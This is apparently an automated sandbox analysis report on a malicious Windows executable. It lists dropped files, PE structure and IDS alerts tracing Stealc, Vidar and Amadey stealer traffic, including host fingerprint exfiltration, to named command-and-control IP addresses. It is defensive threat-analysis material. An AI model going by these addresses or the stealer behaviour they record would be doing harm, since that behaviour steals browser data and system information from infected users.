SHA-512:	C9567A7B02758846C8AA4E201A01CC807233FDBBFC63EBE2D350388682935CA98313531AFF4C026C31B2FFBB6302E220CD6E68BDD42E1E42475400AA6608A084
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................2......<2...@.................................W...k...........................`.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...bndlrsnx..+.......+.................@...myoyjplj......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Documents\DGCAAFBFBK.exe
File Type:	data
Category:	dropped
Size (bytes):	302
Entropy (8bit):	3.439602919305694
Encrypted:	false
SSDEEP:	6:n4lVXUhXUEZ+lX1CGdKUe6tE9+AQy0lzt9ut0:4r4Q1CGAFD9+nVzKt0
MD5:	8452B10937C281C5C40FCA22ED70908D
SHA1:	C0D52FF1051040BFDBEF158A6F239839E5E8233B
SHA-256:	0965E9145262B50D47C1698653887175875C1C8A9ACC48252EC3930FBFDF9925
SHA-512:	005F49FF58A411B1E57DCBD6FE8AD8855DB3B767A2DA34137F31991D8D9AFDAEC50D15181E96784B50E9D662488684258A50454C50BC179B2EFD7FCDBA99AF37
Malicious:	false
Preview:	....y....,.M..p=>.i.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................5.@3P.........................

Chrome Cache Entry: 175

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2412)
Category:	downloaded
Size (bytes):	179299
Entropy (8bit):	5.547369532089825
Encrypted:	false
SSDEEP:	3072:eEBR1XAUw+9+in7oNRFhJpGOa9VMgoeSWInJ+LBIwK555ypuq/dP/JlpNMWzeAx+:eKR1tw+9+i7GFhJcOa/MgoeSWIJ+LBI/
MD5:	E51B78D04BF7FEADF2B7281088079FD5
SHA1:	47E0DCBBC95DA92A2B5E973C33200C3DD82E18A6
SHA-256:	7E8CC44AC8BED91DC83AF132CA1F374227C3A634F9020FFC66720C74A8DBAA53
SHA-512:	5377F671601862CBB506C1B33AA5F5ACAC2C451998C8A1A8E8C6754D2D11C96484483C081FB3A0407BAF1329D70F41ADE5CAB27993B6FA631384243BFC890813
Malicious:	false
URL:	"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.b6tg1FFzATM.2019.O/rt=j/m=q_d,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTv_QWZGpfkLjSgGX6lavnloO0T86g"
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj\|\|(_.bj=new cj)).set(a,b);(_.dj\|\|(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a\|2:a&-3)\|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a\|1};_.lj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.mj=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

Chrome Cache Entry: 176

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (11446)
Category:	downloaded
Size (bytes):	11451
Entropy (8bit):	5.759262445092241
Encrypted:	false
SSDEEP:	192:ipZRqvNJjh9N9462tN6666kbf3Eg58X2JYFVctQ6D9vH6666NO58KS+QyBC+mO:ipZONFR946m6666kbf0gmmKVct/NH66G
MD5:	B305DBB1DD51236856872346E468454B
SHA1:	A4620886C5E5DDAA4150BA0E3C27E4487F0A1872
SHA-256:	287B85B97D718EEF6D9D1F33253CDFDF94DA2E02055E4A0A58D658AEC24839FB
SHA-512:	DC818F7FBB87A29C3EDAADA2D9CD2A069A1774CFD14B4449445FBEC650CBEC8FA102758DD800DD8B3FE7804C75914A49F409E326CDAD220140EE7D1AC0666B61
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["palantir stocks","nba lakers","solo leveling reawakening movie","haunted chocolatier","$25 flights amazon prime","ironman tournament","2025 pearl jam tour dates","storm darragh weather warnings"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"google:entityinfo":"CggvbS8wam1rNxImTG9zIEFuZ2VsZXMgTGFrZXJzIOKAlCBCYXNrZXRiYWxsIHRlYW0y3g5kYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUVBQUFBQW9DQU1BQUFCNUVBemJBQUFCTEZCTVZFWC8vLy85dVNmL3ZDai92eUgvdmlqL3ZDVC93Ui8vd3gwQUFGc1hBSEl3QUc4QUFITW1BSEgvdWlVTkFITVhBR1J5U0dIcjZmRDV0aWtoQUdqeThQV0laQld6Z3h2aHBTT2NjaGprcFRiWG16M2VvVG5hMStQNStQdnlzQzFPSjJrM0RXNnNkMDdFdnRHWmFWYkFpRWVPWUZrL0lIZnBxVE96Zmt5U1kxZURWMXlJV2xxeXE4VGg1ZW1scDZtUWhYT1FkRUpwU1FCYVJCZVluYVBUMTl5enVjREFoZ0NTWndEUWt3Qi9aRFBrb2dETmxpQnRVQkduZFFDSGhZSjlVZ0IxWTBaaFJ3OHBGd0IxWHpnQUFBQjZiMkJhT3dEbTR0bnJ6cC9jckd2T2xFRDU4T2RjTldkR0gydnN0Vn

Chrome Cache Entry: 177

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 178

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	134283
Entropy (8bit):	5.4418390817155
Encrypted:	false
SSDEEP:	3072:fUkX33ov7GsG688fJbk/5xnswLWjwR2i6o:fP3lr6t2/5xnswawR8o
MD5:	BF0DE147A7296144708619735EB97251
SHA1:	33844C4FE5723A99D880D0A6549F3D9E692D73A0
SHA-256:	AD2F6F7EFF6C8010E33335388D0388DBC874309F71A1A9A3F7F4147968AC658F
SHA-512:	58068CFB8CFFF2AAD50A2B4D8E8221CA106394B8D02E5835A364C68BA6161384A1FF1F9E94502E230A1DD31617ACE25D4F384EE0706DAC4FFBA0707383787203
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 179

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	downloaded
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:	96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 180

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.554300769603624
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	5'146'112 bytes
MD5:	443c778fc72c59824a828ece66b8e82a
SHA1:	91fb9df41bba19b6d6612bbafd6d35dc81dc01d6
SHA256:	a43029c07921865be726ccc99e368b445715a3e55279c7faaaae5cad38eb4276
SHA512:	b7d2ea13089446be522b2e69f8a326ff218180aa1a341cd251b13df85ef0f3c68afeb7bb0e2fee57624c9c8a17d7407f75aaf17147186d285d5799b42da00c91
SSDEEP:	24576:Y4Z2BH81kngyVthXEAEsiBE+/XR2YG+pHhXwiiGS4Q8VmviuhAC2WSGS/mUrAwuy:YhBVqAEl/WiOiI7GLBYzmv3DULP8c5
TLSH:	94363962B80572CFD48A26389167FF826D2D43B9471408C7EC58B67ABF66CC119BBF14
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........PE..L...<.Jg...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8e9000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x674AE73C [Sat Nov 30 10:21:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F2D807B316Ah
pcmpgtb mm1, qword ptr [esi+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F2D807B5165h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24a000	0x1f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x249000	b183c00e68303fa4faa8820cce648cad	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1f0	0x200	9536d2b3a2eda870e2407104c9596139	False	0.576171875	data	5.048164681214948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bvxvctom	0x24c000	0x29c000	0x29bc00	6f83750f495eb65672141b5921af9371	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uxtgkroo	0x4e8000	0x1000	0x400	bd22f14e8cec4a5901f26d8857d7747e	False	0.7685546875	data	6.013808206633452	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4e9000	0x3000	0x2200	6dae01ea5cd312fae630107f1167eb90	False	0.060317095588235295	DOS executable (COM)	0.6049383331249656	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x24a058	0x198	ASCII text, with CRLF line terminators			0.5833333333333334

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-07T10:51:13.807119+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49713	185.215.113.206	80	TCP
2024-12-07T10:51:14.254125+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	49713	185.215.113.206	80	TCP
2024-12-07T10:51:14.567257+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.6	49713	TCP
2024-12-07T10:51:14.892593+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	49713	185.215.113.206	80	TCP
2024-12-07T10:51:15.205892+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.6	49713	TCP
2024-12-07T10:51:16.521570+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	49713	185.215.113.206	80	TCP
2024-12-07T10:51:17.234329+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49713	185.215.113.206	80	TCP
2024-12-07T10:51:46.182002+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:48.243875+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:49.626984+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:50.821326+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:54.274531+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:55.378469+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:52:01.000347+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49852	185.215.113.16	80	TCP
2024-12-07T10:53:06.761844+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	50004	185.215.113.43	80	TCP
2024-12-07T10:53:11.244001+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50013	31.41.244.11	80	TCP
2024-12-07T10:53:14.774074+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.6	50010	TCP
2024-12-07T10:53:16.137148+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.6	50014	185.215.113.43	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 7, 2024 10:51:03.496409893 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:03.496450901 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:03.496463060 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:03.496522903 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:03.496551991 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:03.496608973 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:03.499900103 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:03.619360924 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.619435072 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.619447947 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.619558096 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:03.619565964 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.619587898 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.619606972 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.619621038 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:03.619653940 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:03.619700909 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:03.628011942 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.628150940 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.628206015 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:03.636677027 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.636749983 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.636804104 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:03.656701088 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:03.656737089 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:03.776702881 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.776716948 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.776784897 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.776794910 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:03.776819944 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.044723988 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:04.047034025 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:04.047192097 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:04.049542904 CET	49707	443	192.168.2.6	20.198.119.143
Dec 7, 2024 10:51:04.166834116 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:04.166866064 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:04.169243097 CET	443	49707	20.198.119.143	192.168.2.6
Dec 7, 2024 10:51:04.275448084 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.275480986 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.275576115 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.279689074 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.279741049 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.279803991 CET	49706	443	192.168.2.6	40.126.53.13
Dec 7, 2024 10:51:04.288256884 CET	443	49706	40.126.53.13	192.168.2.6
Dec 7, 2024 10:51:04.288357973 CET	443	49706	40.126.53.13	192.168.2.6
